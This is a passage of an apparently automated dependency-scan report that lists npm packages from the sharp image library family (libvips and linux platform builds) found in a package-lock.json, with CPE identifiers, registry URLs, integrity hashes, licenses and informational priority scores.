- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-riscv64:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_riscv64:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_riscv64:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-libvips-linux-riscv64@1.2.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-libvips-linux-riscv64/-/sharp-libvips-linux-riscv64-1.2.4.tgz
|
|
integrity: sha512-oVDbcR4zUC0ce82teubSm+x6ETixtKZBh/qbREIOcI3cULzDyb18Sr/Wcyx7NRQeQzOiHTNbZFF1UwPS2scyGA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 48c4bc7216358207
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-libvips-linux-s390x 1.2.4'
|
|
title: '@img/sharp-libvips-linux-s390x 1.2.4'
|
|
description: 'Package discovered: @img/sharp-libvips-linux-s390x 1.2.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: b12e72c485584ae0
|
|
name: '@img/sharp-libvips-linux-s390x'
|
|
version: 1.2.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: LGPL-3.0-or-later
|
|
spdxExpression: LGPL-3.0-or-later
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-s390x:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-s390x:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_s390x:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_s390x:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-libvips-linux-s390x@1.2.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-libvips-linux-s390x/-/sharp-libvips-linux-s390x-1.2.4.tgz
|
|
integrity: sha512-qmp9VrzgPgMoGZyPvrQHqk02uyjA0/QrTO26Tqk6l4ZV0MPWIW6LTkqOIov+J1yEu7MbFQaDpwdwJKhbJvuRxQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 79972044480a2381
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-libvips-linux-x64 1.2.4'
|
|
title: '@img/sharp-libvips-linux-x64 1.2.4'
|
|
description: 'Package discovered: @img/sharp-libvips-linux-x64 1.2.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: a57b531e02329e6d
|
|
name: '@img/sharp-libvips-linux-x64'
|
|
version: 1.2.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: LGPL-3.0-or-later
|
|
spdxExpression: LGPL-3.0-or-later
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-x64:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-x64:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_x64:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_x64:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-libvips-linux-x64@1.2.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-libvips-linux-x64/-/sharp-libvips-linux-x64-1.2.4.tgz
|
|
integrity: sha512-tJxiiLsmHc9Ax1bz3oaOYBURTXGIRDODBqhveVHonrHJ9/+k89qbLl0bcJns+e4t4rvaNBxaEZsFtSfAdquPrw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 7de94e70bc6a1409
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-libvips-linuxmusl-arm64 1.2.4'
|
|
title: '@img/sharp-libvips-linuxmusl-arm64 1.2.4'
|
|
description: 'Package discovered: @img/sharp-libvips-linuxmusl-arm64 1.2.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 67f7722888e07f97
|
|
name: '@img/sharp-libvips-linuxmusl-arm64'
|
|
version: 1.2.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: LGPL-3.0-or-later
|
|
spdxExpression: LGPL-3.0-or-later
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl-arm64:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl-arm64:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl_arm64:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl_arm64:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-libvips-linuxmusl-arm64@1.2.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-libvips-linuxmusl-arm64/-/sharp-libvips-linuxmusl-arm64-1.2.4.tgz
|
|
integrity: sha512-FVQHuwx1IIuNow9QAbYUzJ+En8KcVm9Lk5+uGUQJHaZmMECZmOlix9HnH7n1TRkXMS0pGxIJokIVB9SuqZGGXw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c540ef9b43418974
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-libvips-linuxmusl-x64 1.2.4'
|
|
title: '@img/sharp-libvips-linuxmusl-x64 1.2.4'
|
|
description: 'Package discovered: @img/sharp-libvips-linuxmusl-x64 1.2.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 61da63d4bf468c4d
|
|
name: '@img/sharp-libvips-linuxmusl-x64'
|
|
version: 1.2.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: LGPL-3.0-or-later
|
|
spdxExpression: LGPL-3.0-or-later
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl-x64:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl-x64:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl_x64:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl_x64:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-libvips-linuxmusl-x64@1.2.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-libvips-linuxmusl-x64/-/sharp-libvips-linuxmusl-x64-1.2.4.tgz
|
|
integrity: sha512-+LpyBk7L44ZIXwz/VYfglaX/okxezESc6UxDSoyo2Ks6Jxc4Y7sGjpgU9s4PMgqgjj1gZCylTieNamqA1MF7Dg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9ac46491201655bd
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-linux-arm 0.34.5'
|
|
title: '@img/sharp-linux-arm 0.34.5'
|
|
description: 'Package discovered: @img/sharp-linux-arm 0.34.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: dcf7df343a75d233
|
|
name: '@img/sharp-linux-arm'
|
|
version: 0.34.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux-arm:\@img\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux-arm:\@img\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux_arm:\@img\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux_arm:\@img\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-linux-arm@0.34.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-linux-arm/-/sharp-linux-arm-0.34.5.tgz
|
|
integrity: sha512-9dLqsvwtg1uuXBGZKsxem9595+ujv0sJ6Vi8wcTANSFpwV/GONat5eCkzQo/1O6zRIkh0m/8+5BjrRr7jDUSZw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f3729e97d1846b60
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-linux-arm64 0.34.5'
|
|
title: '@img/sharp-linux-arm64 0.34.5'
|
|
description: 'Package discovered: @img/sharp-linux-arm64 0.34.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: fd64c295f8bc0b6a
|
|
name: '@img/sharp-linux-arm64'
|
|
version: 0.34.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux-arm64:\@img\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux-arm64:\@img\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux_arm64:\@img\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux_arm64:\@img\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/sharp-linux-arm64@0.34.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/sharp-linux-arm64/-/sharp-linux-arm64-0.34.5.tgz
|
|
integrity: sha512-bKQzaJRY/bkPOXyKx5EVup7qkaojECG6NLYswgktOZjaXecSAeCWiZwwiFf3/Y+O1HrauiE3FVsGxFg8c24rZg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 7108a685f3138a28
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-linux-ppc64 0.34.5'
|
|
title: '@img/sharp-linux-ppc64 0.34.5'
|
|
description: 'Package discovered: @img/sharp-linux-ppc64 0.34.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 3b1510e0e0b839b3
|
|
